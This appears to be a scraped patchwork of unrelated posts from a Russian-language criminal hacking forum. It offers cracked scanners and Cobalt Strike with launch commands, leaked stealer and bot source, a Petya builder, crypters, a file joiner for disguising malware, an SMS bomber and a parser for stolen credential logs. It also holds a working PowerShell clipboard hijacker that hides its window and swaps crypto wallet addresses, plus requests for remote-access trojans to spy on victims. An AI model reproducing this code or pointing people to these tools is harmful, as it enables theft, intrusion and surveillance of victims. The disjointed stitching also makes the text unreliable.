Эта программа используется для оценки конфигурации безопасности веб-сайтов путем проверки наличия заголовков безопасности, таких как Content-Security- Policy и X-Frame-Options. Эти заголовки играют решающую роль в защите веб- приложений от различных угроз безопасности, таких как межсайтовый скриптинг (XSS) и атаки с перехватом кликов (clickjacking).
Обычное использование:
Code:Copy to clipboard
./tik -f domains.txt -t 100
Конечно это ваш выбор, но я советую использовать одно строчки, я пользуюсь вот этим:
Code:Copy to clipboard
./tik -f domains.txt -t 100 > temp.txt && cat temp.txt | grep -oE '[a-zA-Z0-9.-]+\.com' > check.txt && cat check.txt | xargs -P20 -I {} ./vxod {} 2>/dev/null | grep contains > inputs
Приведенный выше код проверяет наличие доменов, уязвимых для перехвата кликов (это делает тык), а затем находит, в каком из доменов есть места для ввода данных (это вход).
Я хочу напомнить вам, что данное программное обеспечение предназначено только для легального использования.
Но чтобы ответить на ваш вопрос, есть статья о том, как я ее использовал:
https://xss.is/threads/101622/
Коммент одного знакомого:
Также мы можем видеть темы на форумах, где хакеры добавляют "iframe" в
магазины, с помощью этого программного обеспечения, если у хакера есть список
доменов, он / она может быть уверен, можно ли будет добавить iframe в магазин
или нет. Поэтому, прежде чем пробовать 1001 способ взлома магазина wordpress,
вы можете просто воспользоваться этим инструментом и отсортировать те, которые
стоит взломать.
Как я уже упоминал в статье:
А если серьезно, в основном получите спасибо котоpый в карман не положишь, но
иногда платят, например тут оплатили -https://hackerone.com/reports/405342
- через наш софт автоматизация легкая.
**После прочтения всех тем я понял, что хороший продукт ( по типу ermak,hook)
Из бюджетных вариантов я часто нарывался на:
cypher rat
Craxs
и другие, по словам экспертов - ремод из spynote,spymax. Не могу понять, что в
них плохого.
Мне не нужны огромные проливы и не нужны готовые инжекты и огромный функционал.
Базовые функции, которые бы я хотел:**
1 File manager (Download/Upload,see all files)
2 Keylogger
3 Скриншоты экрана (скрытые, если нет возможности screen record)
4 APK должен криптоваться и работать на 8-12 ( в идеале 13) андроид
**5 Другие простые функции будут плюсом
6 Важно чтобы бот не умирал мгновенно и работал более чем несколько дней
В идеале функционал:**
7 Мониторинг экрана ( + запись,в идеале простой VNC)
8 Google security bypass
9 APK inject
9 Bank Screen Bypass
10 Доступ к камере
11 Список всех приложений
12 Запрос прав админа { get admin acess for more attacks }
**13 Доступ к просмотру СМС,звонков
Если вы мне можете посоветовать что-то конкретное - пишите для начала здесь - в теме, спасибо.
ENG VERSION
After reading all the topics, I realized that a good product (like ermak,
hook) is an expensive product.
Moreover, the first one seems to be closed.
As I understand it, it is bought for a huge number of installations, I need a
small number
of installations.
From budget options, I often ran into:
cypher rat
Craxs
and others, according to experts - remod from spynote, spymax. I can't figure out what's wrong with them.
I don't need huge spills and I don't need ready-made injections and huge functionality.
Basic functions that I would like:
1 File manager (Download/Upload,see all files)
2 Keylogger
3 Screenshots of the screen (hidden if there is no screen record option)
4 APK should be crypted and work on 8-12 (ideally 13) android
5 Other simple functions will be a plus
6 It is important that the bot does not die instantly and works for more than
a few days
Ideally functional:
7 Screen monitoring (+ recording, ideally a simple VNC)
8 Google security bypass
9 APK inject
9 Bank Screen Bypass
10 Access to the camera
11 List of all applications
12 Request admin rights { get admin acess for more attacks }
13 Access to viewing SMS, calls
If you can advise me something specific - write to start here - in the topic, thank you.**
Hello everyone ,
I am offering 20 paid whatsapp license keys absolutely free for xss members. These are not keygen genarated keys or any cracked keys. You can download the software from official site https://tigervikram.com/ and ask me for the license key. The software is really fast in filtering active numbers and sending bulk messages using different whatsapp numbers. Features can be read on website itself. Please share a reaction and comment and PM me for license key. Only 20 licenses available.
Всем привет ,
Я предлагаю 20 платных лицензионных ключей WhatsApp абсолютно бесплатно для членов xss. Это не ключи, сгенерированные кейгеном, или взломанные ключи. Вы можете скачать программу с официального сайта https://tigervikram.com/ и запросить у меня лицензионный ключ. Программное обеспечение очень быстро фильтрует активные номера и отправляет массовые сообщения с использованием разных номеров WhatsApp. Характеристики можно прочитать на самом сайте. Пожалуйста, поделитесь реакцией и комментариями и напишите мне в личку для получения лицензионного ключа. Доступно только 20 лицензий.
Client:
USG:
Why this shit is called 'the legend' ?
+maybe because it was the first crypter with usg, i've invented it.
+maybe because kaspersky wanted to buy the source of it
+maybe because it has many unique options.
+maybe because it was fud up to one month.
"Yeah, right. Give me a break with your kid tools"
@Kaspersky Now you can analyze this source, you don't need to pay for it )
Download:
http://up.ht/IZcHop
Ребята, написал несколько софтин которые уверен всем нужны в работе дабы облегчить хоть немного не легкий наш труд :
GoStringParser : парсер данных из строк, умеет обрабатывать большие файлы
GoSorterTLDs : автоматическая сортировка строк, содержащих домены, по их
TLD
GoFileMerge : программа для быстрого и удобного объединенные файлов в один
файл
GoFileCounter : программа для подсчета количество строк в файлах,
рекурсивно
GoDmarcSpfChecker : программа для массовой проверки доменов на DNS-записи
DMARC и SPF
GoFileSpiter : программа для быстрого и удобного разбиения больших файлов
на части
Весь софт написан на шустром, быстром Golang, заходим на мою страничку и качаем https://digizoid.net/martin.html
Если есть идеи что еще можно накодить, пишем сюда свои идеи, реализую.
Для связи телега: @digizoid_martin
Продавалась за 700 баксов вроде месяц/два назад
Сливаю вам
в архиве инструкция
Личный кабинет пользователя
Система администрирования:
You must have at least 40 reaction(s) to view the content.
Благодарность
Eth erc 20
0xBaaEBe66eE16c47122942ed292a10AF7adF5Ad65
Данные исходники ранее еще не были слиты нигде!
В исходники входит:
1. Бот
2. Веб-панель
3. Стиллер
Мини мануал для работы стиллера:
Stealer:
Build.cs - 311 строка(домен)
Build.cs - 361 строка(домен)
connection.cs - 13 строка(домен)
ErrorReporter.cs - 15 строка(домен)
Bot:
Config.cs:
TOKEN - токен вашего тг бота
logsDirectory - дирректория логов
panelURL - ссылка на вашу панель
newsLink - линк на новостной канал
chatLink - линк на чат
qiwiNumber - номер киви для платежей
qiwiToken - токен киви для платежей
LolzUsername - имя на лолзе(лолз х#йня)
LolzToken - токен на лолзе(лолз х#йня)
LolzID - id на лолзе(лолз х#йня)
Замена названия стиллера (для Visual Studio):
Правка -> Найти и заменить -> Заменить в файлах -> первая строка - Название
стиллера, вторая строка - название которое вы хотите поставить.
htdocs:
panel_checker.py - 59,60 строки(линки на разрабов)
routes.py - 304, 305 строки(линки на разрабов)
Скачать исходы:
anonfiles.com
**Version 13 (Windows / Linux: 13.0.200807155, macOS: 13.0.200807156) 7th August 2020
New Features**
-Acunetix is now available in Chinese
-Path Fragments are now shown in the site structure
New Vulnerability Checks
-New check for Insecure Inline Frames
-New check for Remote code execution of user-provided local names in Rails
-New check for SAP NetWeaver RECON auth bypass vulnerability
-New check for H2 console publicly accessible
-New check for PHP version disclosure
-New check for Atlassian JIRA ServiceDesk misconfiguration
-New test for Jolokia XML External Entity (XXE) vulnerability
-New checks for WordPress core, WordPress themes, WordPress plugins, Joomla and Drupal
Updates
-Created and Last Updated dates are available for vulnerabilities
-Order of section in Comparison report updated to be more intuitive
-Target Address is shown in full in the UI /users/ endpoint is now available in the API
Fixes
-Fixed issue when exporting vulnerabilities to WAF which contained CVSS3.1
-Fixed issue causing custom user-agent to not be used in all requests during a scan
-Fixed issues causing some vulnerabilities not to be well formatted when sent to JIRA issue tracker
-Fixed issue when adding JIRA Issue Tracker in Acunetix Online
-Fixed issue caused when adding Targets to an existing Target Group
-Minor fix in Comprehensive report text
-Fixed UI issue showing blank list (Scans, Targets etc) when using the browser’s back button
-Fixed issue caused by scanning Targets with complex GraphQL schemas
Установка:
Скачиваем архив, распаковываем файлы (.exe, .sh, .pkg) и устанавливаем в
зависимости от вашей ОС
Скачать:
](http://www.mediafire.com/file/cjq39bpijfvdkxs/acunetix.zip/file)
MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.
www.mediafire.com
Ultimate Log Checker Machine by Kijomba
Почти полноценный Парсер логов, функционал:
- Масс выгрузка (в файл/в буфер обмена):
-- Emails
-- Passwords
-- Usernames
-- Discord Tokens
- Точечный поиск:
-- Поиск логов по совпадению со строкой - запросом
-- Выборка в формате Url, User, Pass, Cookies, UserInfo по запросу
-- Выгрузка Логов с запросом в отдельную папку
-- Выгрузка выборки в отдельную папку в формате Log Id: LoginData.txt /
Cookies.txt / UserInfo.txt
-- Софт так же чекает Имейлы на соответствие формату
-- Пока поддерживает только формат Redline
Доп функционал:
-- ГУЙ
-- Удаление Дубликатов(По всем полям)
-- Обратная связь со мной
Планируемый функционал(возможно платный
):
Оптимизция
-Масс выгрузка:
-- СС
-- FTP
-- Steam
- Другие форматы
- Работа с Телеграм сессиями
- Чек Фтп
- Полноценная работа с криптой
-- Чек
-- Брут
-- Авто подгруз расширений и запуск браузера
- Более удобная работа с единичным логом
- Подгруз конфига на основе лога в Сферу (куки, пассы, железо)
- Туда же работа с прокси, подбор на основе лога
Пока так
Обновления софта раз в 3-4 дня.
Инструкция внутри, пасс местный, Python 3.8.3.
Все пожелания / предложения / багрепорты можно отправить прямо с софта через
фидбек.
За донат отдельное спасибо как и за плюсик в репу.
PыSы: в разработке стилак нового поколенния и такой же сервис для
обработки логов, так что оставайтесь на
сязи
Чекер на Паблик логи:
/threads/67238/
Этот кодер в поисках работы
/threads/65125/
Burp Suite Professional v2023.1 + BurpBounty Pro 2.6.1
Early Adopter, Released Thursday, 12 January 2023
Hidden content for authorized users.
You must have at least 5 reaction(s) to view the content.
Code:Copy to clipboard
Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public static void Hide()
{
IntPtr hWnd = GetConsoleWindow();
if(hWnd != IntPtr.Zero)
{
ShowWindow(hWnd, 0);
}
}
'
[Console.Window]::Hide()
$addy = @{
"BTC" = "Your btc addy"
"ETH" = "Your eth addy"
"LTC" = "Your ltc addy"
"TRX" = "Your trx addy"
"XMR" = "Your xmr addy"
}
while ($true) {
$clipper = Get-Clipboard
if ($clipper -match "^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$") {
$clipper = $addy["BTC"]
[System.Windows.Forms.Clipboard]::SetText($clipper)
}
elseif ($clipper -match "^0x[a-fA-F0-9]{40}$") {
$clipper = $addy["ETH"]
[System.Windows.Forms.Clipboard]::SetText($clipper)
}
elseif ($clipper -match "^[LM][a-km-zA-HJ-NP-Z1-9]{26,33}$") {
$clipper = $addy["LTC"]
[System.Windows.Forms.Clipboard]::SetText($clipper)
}
elseif ($clipper -match "^T[a-zA-HJ-NP-Z0-9]{33}$") {
$clipper = $addy["TRX"]
[System.Windows.Forms.Clipboard]::SetText($clipper)
}
elseif ($clipper -match "^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$") {
$clipper = $addy["XMR"]
[System.Windows.Forms.Clipboard]::SetText($clipper)
}
Start-Sleep -Seconds 1
}
**
CryptoChecker **- программа для проверки криптокошельков
До 13 сервисов - MetaMask, RoninWallet, BraveWallet, BinanceChain, TronLink, Bitcoin, Bitcoin Core, Litecoin, Dogecoin, Ravencoin, MyEtherWallet, Exodus (PRO), Atomic (PRO), Phantom (PRO)
Проверка на AirDrops, NFT, Stakings + 6 сетей
Подбор пароля с получением seed-фразы (браузерные кошельки, Exodus и Atomic)
Режим проверки seed-фраз на Bitcoin, Ethereum (и ему подобные сети) и Solana
Hidden content for authorized users.
•Если у вас не работает лоадер, то делайте по инструкции:
https://telegra.ph/Kak-ispolzovat-kryak-CryptoChecker-01-13
p.s. из за особенностей каждой системы не везде может работать лоадер
• Ошибки в консоли - игнорируйте их, это баги софта
• После лоадера с компьютером что то не то - нажмите ctrl+shift, это происходит из за эмуляции выделения консоли для инжекта
Собственно, сабж.
Описание:
red teaming evasion technique to defeat and divert detection and prevention of
security products.Mortar Loader performs encryption and decryption of selected
binary inside the memory streams and execute it directly with out writing any
malicious indicator into the hard-drive. Mortar is able to bypass modern anti-
virus products and advanced XDR solutions and it has been tested and confirmed
bypass for the following:
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F0a2edf2f090ada11a1be15f9b7717f0140e9d12273dac878e19364eecf6198b5%2F0xsp- SRD%2Fmortar&hash=8e251d9bffba17e64405ea9a1fee63da&return_error=1)
detection and prevention of security products (AV/EDR/XDR) ](https://github.com/0xsp-SRD/mortar)
evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR) - 0xsp-SRD/mortar
github.com
Trial не требуется. Релиз от Pwn3rzs
Download
Acunetix has been updated to detect the following vulnerabilities using IAST:
Acunetix IAST (AcuSensor) has been updated to detect over 30 new server-side misconfigurations across all sensors:
You must have at least 1 reaction(s) to view the content.
Masscan хороший сканер,но не совсем удобно работать с ним так как у него нет интерфейса ,по этому сделал маленький GUI для него.
+ Софт копирует диапазоны с сайта ipdeny.com
+ Импорт из .txt через Drag and drop.
+ Очистка текста от мусора (удобно если копировать IP диапазоны с сайта myip.ms)
+ Парсинг IP адресов.
+ Экспорт в формате IP:PORT
+ Каждый порт в отдельном файле,например выставил порты 3389,22, программа записывает 3389.txt, 22.txt.
+ Запоминает настройки(порты,rate).
+ Опция Resume Scan.
File : Massscan_GUI.exe
MD5 : 7a6990bf78f3e2e835d3be85a2fea4ba
SHA1 : 9e2760e0c13d56cb744262b4fdef67e17ee08571
CRC32 : aa815b1c
Size : 334 KB
Данное приложение - это программа для тестирования/сканирование собственных сетей.Автор не несет ответственности за использование комплекса потребителем в неправомерных целях.
Автор masscan-a можно найти сдесь,если есть вопросы по запуске,пишите ему.
Для тех кому нужна установка/настройка на линуксе,могу помочь но платно.
Софт имеет детектов по несколько причин :
1. Обфускация
2. Тематика (Hack Tool)
3. Сканировали его,запускали везде.
Скачайте только ссылки которые оставлю я ,очень много склеек везде,иногда masscan gui весит и 10 mb
Инструкция по настройке и запуску:
Чтобы запустить командный сервер, вам нужна система Linux. Вы должны
установить jdk13.
Сначала введите эту команду, чтобы запустить командный сервер. Замените IP и ПАCC своим IP и любым паролем, который вы выберете.
java -XX:ParallelGCThreads=4 -Dcobaltstrike.server_port=50050 -Djavax.net.ssl.keyStore=./cobaltstrike.store -Djavax.net.ssl.keyStorePassword=sUp3r@dm1n -server -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -classpath ./cobaltstrike.jar server.TeamServer IP PASSWORD
Затем выполните эту команду в отдельном терминале, чтобы запустить CS:
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -jar cobaltstrike.jar $*
You must have at least 100 reaction(s) to view the content.
Исходный код, билдера известного вымогателя Petya.
Mega:
You must have at least 50 reaction(s) to view the content.
Пишу под свои нужды по быстрому софт для работы с mail : pass
Скачать актуальную версию: https://yadi.sk/d/VZhODZtS70__Kg
Думаю особо описывать пока смысла нет, как соберу нормальный набор - сделаю описание.
Пишите пожелания, что добавить, что убрать)
Ну и по типам хешей допишите, очень интересно какие часто попадаются, чтобы сортировать
Увидел, тут в соседней теме продают нечто подобное.
Ловите бесплатную версию.
ICG-AutoExploiterBoT
Бесплатный инструмент для тестирования на проникновение,
работает на 3.x и 2.x версии python
https://github.com/04x/ICG-AutoExploiterBoT
![](/proxy.php?image=https%3A%2F%2Fraw.githubusercontent.com%2F04x%2FICG- AutoExploiterBoT%2Fmaster%2Fscreen%2Fscreen2.PNG&hash=82b6af04d120f49b7186094d0c25605d)
![](/proxy.php?image=https%3A%2F%2Fraw.githubusercontent.com%2F04x%2FICG- AutoExploiterBoT%2Fmaster%2Fscreen%2Flog.PNG&hash=68cff1baa2fb4b07d502f5c8d1522659)
Функционал:
**OsCommerce Exploits **
- OsCommerce 2.x Core RCE
**Drupal Exploits **
- Drupal Add admin
- Drupal BruteForcer
- Drupal Geddon2 Exploit - Upload shell + Index
- CVE-2019-6340 Drupal8 RCE Exploit
Joomla Exploits
- Joomla BruteForcer
- RCE joomla 1.x < 3.x
- Add Admin joomla 0day 3.x
- JCE Index + upload Shell Priv8
- jdownloads index + shell priv8
- com_media Index
- Com_fabrik index + Shell priv8
- com_alberghi Index
- Com_AdsManager index + Shell priv8 Method
- Com_MyBlog Index
- Com_CCkJseblod Config Download
- Com_Macgallery Config Download
- Com_Joomanager Config download
- Com_Hdflvplayer Config Download
- Com_s5_media_player Config Download
- Com_FoxContact UploadShell + Index
- Com_Jbcatalog Upload Index & Shell
- Com_SexyContactform Upload Index & Shell
- Com_rokdownloads Upload Index & Shell
- Com_extplorer Upload Index & Shell
- Com_jwallpapers Upload Index & Shell
- Com_facileforms Upload Index & Shell
**Wordpress Exploits **
- Wp 4.7 Content Injection
- Revslider css Index + Config + Shell Upload
- wp-user-frontend Exploit
- gravity-forms Exploit
- HD-webplayer Exploit
- wysija Exploit
- pagelines Exploit
- Headwaytheme Exploit
- addblockblocker Exploit
- cherry-plugin Exploit
- formcraft Exploit
- userpro take ADmin panel wordpress [priv8] Exploit
- wp-mobile-detector Exploit
- wp-job-manager Exploit
- woocomerce Exploit
- viral-optins Exploit
- Wordpress Downloads-Manager Exploit Upload shell + Index
- Wordpress Category-Page-icons Exploit
- wp_support_plus_responsive_ticket_system Download Config
- wp_miniaudioplayer Download Config
- eshop_magic Download Config
- ungallery Download Config
- barclaycart Upload Index & Shell
- Wordpress BruteForce
- Wordpres wp gdpr compliance Plugin Exploit
Prestashop Exploits
- lib Prestashop Module Exploit
- psmodthemeoptionpanel Prestashop Module Exploit
- tdpsthemeoptionpanel Prestashop Module Exploit
- megamenu Prestashop Module Exploit
- nvn_export_orders Prestashop Module Exploit
- pk_flexmenu Prestashop Module Exploit
- wdoptionpanel Prestashop Module Exploit
- fieldvmegamenu Prestashop Module Exploit
- wg24themeadministration Prestashop Module Exploit
- videostab Prestashop Module Exploit
- cartabandonmentproOld Prestashop Module Exploit
- cartabandonmentpro Prestashop Module Exploit
- advancedslider Prestashop Module Exploit
- attributewizardpro_x Prestashop Module Exploit
- attributewizardpro3 Prestashop Module Exploit
- attributewizardpro2 Prestashop Module Exploit
- attributewizardpro Prestashop Module Exploit
- jro_homepageadvertise Prestashop Module Exploit
- homepageadvertise2 Prestashop Module Exploit
- homepageadvertise Prestashop Module Exploit
- productpageadverts Prestashop Module Exploit
- simpleslideshow Prestashop Module Exploit
- vtermslideshow Prestashop Module Exploit
- soopabanners Prestashop Module Exploit
- soopamobile Prestashop Module Exploit
- columnadverts Prestashop Module Exploit
**Opencart Exploits **
- Opencart BruteForce
Установка:
Code:Copy to clipboard
Скачайте с github автора zip архив.
Браузер ругнетса на содержание вирусов, тут на свое усмотрение.
Откройте файл .py и замените в 46 строке на свой email.
Запустите AutoExploiter
История Acunetix Premium
Версия 14 (сборка 14.3.210628104) 28 июня 2021 г.
Обновления
Целевая база знаний будет сброшена при изменении целевых настроек.
Обновлено уведомление о пороге истечения срока действия сертификата SSL / TLS
с 30 до 60 дней.
Исправления
Исправлено: шаблон отчета о соответствии OWASP не был доступен в некоторых
редакциях.
Исправлено: некоторые скрипты не наблюдали исключенные пути, настроенные в
настройках цели.
Лицензия на программное обеспечение: Premium Edition
Версия: 14.3.210628104
Цена: 2,5 миллиона долларов
Скидка: 100% OFF
Имя файла: Acunetix Premium v14.3.210628104 Полная активация - WwW.Dr-
FarFar.CoM.zip
Размер: 171,7 МБ
Вы просили я вам дарю.
https://temp.sh/UYpCh/privet.rar
нужны норм прокси исопльзовать только на vps или вирте на свой страх и риск (я
не проверял склейки и тд) сам парсер работает
выкладываю на темп ссылка будет жить 3 дня затем будете делиться друг с
другом)
Infinite Bomber
Как-то захотелось сделать СМС-бомбер. Я его сделал. И ещё встроил Tor для анонимности и чтобы IP-адрес атакующего не заносили в чёрный список сайты использованные в бомбере (меняет IP-адрес каждые 40 секунд). Потом ещё мы с напарником продавали его. Но мне через месяц надоело, и я забил на это. А сейчас, я хочу опубликовать программу и её исходники (уже бесплатно) на каком- нибудь форуме. Не хочу чтобы зря пропадало. Почти ни как не дорабатывал прогу за последние ~2 месяца, но Dolbit всё ещё Normalno.
В архиве есть исходники, а в папке builds уже скомпилированные бинарники (для релиза).
Ссылка на скачивание:http://wdfiles.ru/ehiK (35.5 МБ)
автор: @notBrut0r
Spoiler: Что нового:
**Скачать:
You must spend at least 100 day(s) on the forum to view the content.
](https://gofile.io/d/f1u6sb)
Gofile is a free file sharing and storage platform. You can store and share data of all types. There is no limit and everything is free.
gofile.io
**
CapMonster Pro v2.10.16.0 Cracked
CrackStatus : Only Crack
LastVersion(v2.10.16.0)
CrackedModules : CapMonster + CapMonsterMCS
Hidden content for authorized users.
](https://mega.nz/#!afYGyIrA!RFn8g7MlyjPtBHOTy_wtIDwRBlxFAHcXbgIkzeQpea4)
MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 50GB now
mega.nz
https://www.coresecurity.com/products/core-impact - описание.
Crack (c инструкциями)
You must spend at least 300 day(s) on the forum to view the content.
You must have at least 37 message(s) to view the content.
Installer
You must spend at least 300 day(s) on the forum to view the content.
You must have at least 37 message(s) to view the content.
Работает , проверил . Хорошо видит впн туннель и легко настраивается на работу
через него .
Если у кого есть ру мануал с примерами или кукбук , ExCraft SCADA Pro - пак
сплойтов, или что то подобное - поделитесь плз
UpGuard утверждает что он стоит 30к$, всего то 2 мульта вечнодеревянных
You must spend at least 300 day(s) on the forum to view the content.
You must have at least 40 message(s) to view the content.
P.S
Не работайте по РУ и братьям славянам!
[https://mega.nz/file/QOwXCK7Q#2D7bGDb-HqjyX947oXHzRp1zO0guyICP-
bV9y4FTy0g](https://href.li/?https://mega.nz/file/QOwXCK7Q#2D7bGDb-
HqjyX947oXHzRp1zO0guyICP-bV9y4FTy0g)
https://www.virustotal.com/gui/file...e91072a9e4fc6a3a23c01e3d24fe992443a/detection
Кто не может установить смотрите видео!
https://youtu.be/moVoW1eN52c
Всё отлично работает,но да теряется коннект с проксей лечится ток
перезагрузкой сферы
Данный софт от автора стиллера из этой темы.Является ли он форком - смотрите сами, но могу сказать точно - софт не стоит 150$.Сам билдер был под модом фусера(Darks Protector)
Spoiler: Объявление с продажника
Большое спасибо IPirateS6 за предоставление лицензионного
билдера!
Скачать: https://anonfiles.com/X5sfLco1p5/ManClipper_cracked_zip
Приветствую всех, валяется криптор на компе без дела, впринципе из паблика
лучше еще не видел чем данный криптор.
+ Детект от 3 до 5
- вес файла до трех мб. можно сделать манипуляции по сжатию по вашему
усмотрению.
Можно еще сделать доп. обфус, и склеить с каким нибудь cert, все зависит от
вас, удачного вам пользовани
![](/proxy.php?image=https%3A%2F%2Fsocinator.com%2Fwp- content%2Fuploads%2F2018%2F11%2FScreenshot_4-4.png&hash=98373effbc22d4039f4b889d49cc3d44)
![](/proxy.php?image=https%3A%2F%2Fsocinator.com%2Fwp- content%2Fuploads%2F2019%2F05%2FDelete- Post.png&hash=06a532b367ed08dbb260c8ba3f346af4)
Социальные сети могут охватить миллионы людей по всему миру. Как специалист по маркетингу в социальных сетях, не хотите ли вы уделить еще несколько часов в день? Мы, конечно, знаем, что ответ ДА.
Вы можете быть одним из многих маркетологов по всему миру, которые борются за выполнение своих задач в социальных сетях КАЖДЫЙ ДЕНЬ и устают от выполнения повторяющихся задач.
Нам всем приходится ежедневно так много манипулировать, чтобы не иметь
возможности проводить время с семьей
и друзья и, самое главное, наша работа больше не 9-9 с постоянно растущим
списком задач, список, который становится все длиннее и длиннее и увеличивает
наш уровень стресса.
Мы все ищем способ оказать большее влияние на социальные сети, особенно в МЕНЬШЕ времени. Социнатор позволяет нам сделать это.
Что можно автоматизировать с помощью Socinator?
Вот список социальных сетей, которые можно автоматизировать с помощью Socinator:
Instagram,
Facebook,
Twitter,
Quora,
LinkedIn,
YouTube,
Pinterest,
Google+,
Reddit,
Tumblr
Instagram, Facebook, Twitter, Quora, LinkedIn, YouTube, Pinterest, Google+,
Reddit, Tumblr Automation
Advanced Publishing
Socinator lets you auto publish and schedule your posts on multiple networks
at once, including Instagram, Twitter, Facebook, Google+, LinkedIn etc. Its
also having an ability of content curation by importing content via RSS feeds,
monitoring folder etc. making it the smart auto post scheduler.
Instagram Automation Features
Grow your Instagram accounts 10x faster:
Auto Follow, Follow Back, Auto Like, Auto Comment, Auto Repost, Auto Messages,
Live Chat and Many More
Facebook Automation Features
Increase Engagement and Precised Audience Reach:
Auto Friend Requests, Auto Accept Friends, Auto Like, Auto Comment, Auto Join
Groups, Auto Unjoin, Live Chat and Many More
Twitter Automation Features
Boost your activities on Twitter for better engagement and ROI
Auto Follow, Follow Back, Auto Like, Auto Comment, Auto Retweet, Auto
Messages, Live Chat and Many More
YouTube Automation Features
Schedule your YouTube accounts on Auto-pilot, and watch them growing.
Auto Follow, Auto Subscribe, Auto Unfollow, , Auto Like, Auto Comment and Many
More
Quora Automation Features
Everything you need to succeed on Quora:
Auto Friend Requests, Auto Downvote Answers, Auto Upvote Answers, Auto Report
User, Auto Upvote Questions, Find And Extract Answers, Find And Extract Users
and Many More
gPlus Automation Features
Be 24/7 Engaged with your Audience on gPlus.
Auto Follow, Auto Post/Share Content In Your Communities, Auto Unfollow, Auto
Unfollow, Join/Unjoin Communities In Your Niche and Many More
Pinterest Automation Features
Give boost to your Pinterest account for faster growth and 20x more revenue.
Auto Follow, Auto Follow Back, Auto Try, Auto Comment, Auto Repin, Auto Create
Boards, Auto Unfollow and Many More
LinkedIn Automation Features
Make your Professional Network more bigger and connect with potential partners
and customers on the go.
Auto Accept/Cancel Connection Requests, Auto Endorse Connections, Auto Engage
with Likes and Comments, Auto Post/Share Content In Your Groups, Auto Reply to
new messages, Find And Extract Answers, Find And Extract Users and Many More
Reddit Automation Features
Boost your activities on Twitter for better engagement and ROI
Auto Follow, Follow Back, Auto Like, Auto Comment, Auto Retweet, Auto
Messages, Live Chat and Many More
Tumblr Automation Features
Schedule your YouTube accounts on Auto-pilot, and watch them growing.
Auto Follow, Auto Subscribe, Auto Unfollow, , Auto Like, Auto Comment and Many
More
Other Socinator Features
Socinator is also packed with some amazing powers like:
Auto publish posts from RSS, Auto shorten URLs, Auto Submit captcha
verification, Detailed report for each and every activity, Embedded browser
for each network, Analytics and Growth Metrics.
Скачать:
You must have at least 5 reaction(s) to view the content.
Последняя версия acunetix premium Acunetix 13.0.201217092 (17 December 2020)
(данная версия ищет sqli лучше чем предыдущие - на удивление, согласно одному
из моих тест сайтов)
https://prnt.sc/w8t3u4
Captured with Lightshot
prnt.sc
https://prnt.sc/w8t4hq - всё прекрасно работает .
Кряк - заменить файлы в корневой папке программы /program
files/acu/13.0*******/ и в папке program data/acu/shared/license
Скачать
You must have at least 28 message(s) to view the content.
Version 13 build 13.0.201217092 for Windows, Linux and macOS – 17th December
2020
New Features
New Vulnerability Checks
Updates
Fixes
Джойнер файлов в единый .exe файл
Два вида джойнера файлов:
Ссылка на архив с исходниками: https://yadi.sk/d/Izb9SJgwcR5DyA
Доп ссылка на архив с исходниками:
https://mega.nz/file/yDBzSQgR#vQ3O8QEITTuZ9AtD-72zQN7qcrvjIz8zuSOtSjFnbg0
Pass: r3xq1 ( вводить руками )
P.S: VT не требуется
Всем привет. Давно не слежу за данной сферой, но сейчас понадобилось немного "чернухи". В общем, нужно что-то типа RMS, rat, cometa чтобы получить доступ к компьютеру жертвы и скачивать файлы оттуда и все дела. Также, желательно exe'шник склеить с вордовским документом, для отправки файла по почте жертве. Кто что может посоветовать рабочее на данный момент ?
Пы.сы. может есть что-то с отправкой лог и пароля для подключения на почту или же чтобы эти данные автоматические вводились в программу на твоем пк.
Code:Copy to clipboard
█████ ███████ ████████
████████ ██████████ ██████████
████ ███ ████ ████ ███ ██ ███
███ ██ ███ ███ ██ ███
███ ███ ███ ███ ████ ████ ███████ ███
███ ███ ███ ███ ████████ ██████ ████████████
███ ███ █████ ███ ███ ███ ███ ███ ████ ███ ████
███ ████████ ███ ███ ███ ███ ███ ███ ███
███ ████████ ███ ████████ █████ ███ ███ ███
████ ██ ████ ████ ███ ██████ ██████ ███ ███ ███
████ ███ ███ ████ ███ ███ ██ ███ ███ ███ ███ ███
█████████ ███ ████ ███ ████ ██ ███ ███ ███ ███ ███
███████ ███ ████ ████ ████████ ███████ ███ ███ ███
█████ ████ ████ ████ █████ ██████ ███ ████ ████
Proudly Presents
╓═══════════════════════════════════════════════════════════════════════════════════╖
║ ...:sensecoder.pw:... ║
║┌═════════════════════════════════─══╤════╤══─════════════════════════════════════┐║
║│ │░▒▓░│ │║
║│ Cracked by..................hlop │░▒▓░│ Release type.................Patch │║
║│ Supplied by.................hlop │░▒▓░│ Protector................VMProtect │║
║│ Tested by...................hlop │░▒▓░│ Time for crack...............02:23 │║
║│ Packaged by.................hlop │░▒▓░│ Src language................Delphi │║
║│ Release date..........09-11-2020 │░▒▓░│ Price........................6494р │║
║│ Release size...............62180 │░▒▓░│ Version......................laste │║
║│ │░▒▓░│ │║
║╞═════════════════════════════════─══╧════╧══─════════════════════════════════════╡║
║│ ┌──────────────────────┐ │║
║│───────────────────────────├─── INSTALLATION ───┤──────────────────────────────│║
║│ └──────────────────────┘ │║
║│ │║
║│ Запустить программу от имени админа │║
║│ Нажать кнопку "Войти в программу" │║
║│ │║
║╞═════════════════════════════════════════════════════════════════════════════════╡║
║│ │║
║│─[DESCRIPTION]───────────────────────────────────────────────────────────────────│║
║│ │║
║│ Комплект: │║
║│ Abaddon Extreme 2.0 │║
║│ AccurateBase 3.7.1 │║
║│ Bloodhound 1.0a │║
║│ E-Mail Machine 1.4 │║
║│ Origin Checker 1.1.1b │║
║│ SMS Machine 3.6.1 │║
║│ Uplay Checker 1.3b │║
║│ Valorant Checker 1.1b │║
║│ Wish Checker 2.5.1b │║
║│ │║
║│ Ничего не вырезано, не перекодировано │║
║│ │║
║│ │║
╠═══════════════════════════════════════════════════════════════════════════════════╣
